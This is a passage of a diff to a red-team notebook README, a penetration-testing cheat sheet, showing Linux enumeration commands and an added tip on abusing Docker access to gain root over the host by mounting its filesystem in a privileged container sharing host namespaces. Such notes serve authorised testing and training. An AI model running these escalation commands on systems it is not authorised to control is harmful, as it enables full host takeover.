foobarto/redteam-notebook/README.md

 sudo version? `sudo -V`
 Available compilers `dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null`

+### Docker tips
+Since most likely Docker runs as root if you can execute docker commands as unpriviledged user you can very likely use Docker's privs instead.

+`docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash` - note that the root folder from host is mounted as `/host`.
+You'll also see all processes running on host and be connected to same NICs.

+You may want to look into escaping UTS and IPC namespacing with `--uts=host --ipc=host`

 ### Upload files using cUrl with WebDAV
 ```